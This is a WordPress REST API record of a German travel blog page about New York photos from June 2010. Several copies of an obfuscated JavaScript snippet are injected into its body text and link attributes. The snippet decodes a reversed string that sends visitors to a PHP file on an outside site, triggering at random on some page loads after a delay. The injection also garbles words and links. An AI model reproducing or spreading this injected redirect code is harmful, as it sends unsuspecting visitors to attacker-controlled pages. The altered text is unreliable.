{"id":746,"date":"2010-06-08T17:44:04","date_gmt":"2010-06-08T16:44:04","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?page_id=746"},"modified":"2014-05-14T20:12:41","modified_gmt":"2014-05-14T19:12:41","slug":"new-york","status":"publish","type":"page","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/montreal-die-ersten-eindrucke\/new-york","title":{"rendered":"New York"},"content":{"rendered":"<p>Ja in New York gibt es so viel zu sehen und fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tografieren.\u00a0 Ist einfach der Hammer die Stadt. Daher halt auch etwas mehr Eindr\u00fccke \ud83d\ude42<\/p>\n<p>Individuelle W\u00fcnsche und Bilder k\u00f6nnen bei <a title=\"Fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;&#8218;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo G. Lehmann&#8220; href=&#8220;http:\/\/www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch&#8220; target=&#8220;_blank&#8220;>www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch<\/a> eingereicht werden. <a title=\"Kontakt Fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;&#8218;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch&#8220; href=&#8220;http:\/\/www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch\/contact.htm&#8220; target=&#8220;_blank&#8220;>Kontakt hier<\/a><\/p>\n<p>Snoopy<\/p>\n<p><strong><span style=\"font-size: medium;\">New York<\/span><\/strong> und noch ein paar Eindr\u00fccke USA , <strong>10. und 11. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_0_placeholder<br \/>\n<strong><span style=\"font-size: medium;\">New York<\/span><\/strong> USA , <strong>8. und 9. Juni 2010<br \/>\n<\/strong><\/p>\n<p>ngg_shortcode_1_placeholder<\/p>","protected":false},"excerpt":{"rendered":"<p>Ja in New York gibt es so viel zu sehen und fotografieren.\u00a0 Ist einfach der Hammer die Stadt. Daher halt auch etwas mehr Eindr\u00fccke \ud83d\ude42 Individuelle W\u00fcnsche und Bilder k\u00f6nnen bei Kontakt hier Snoopy New York und noch ein paar Eindr\u00fccke USA , 10. und 11. Juni 2010 New York USA , 8. und 9&#8230;.<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":672,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/746"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=746"}],"version-history":[{"count":4,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/746\/revisions"}],"predecessor-version":[{"id":1677,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/746\/revisions\/1677"}],"up":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/672"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=746"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}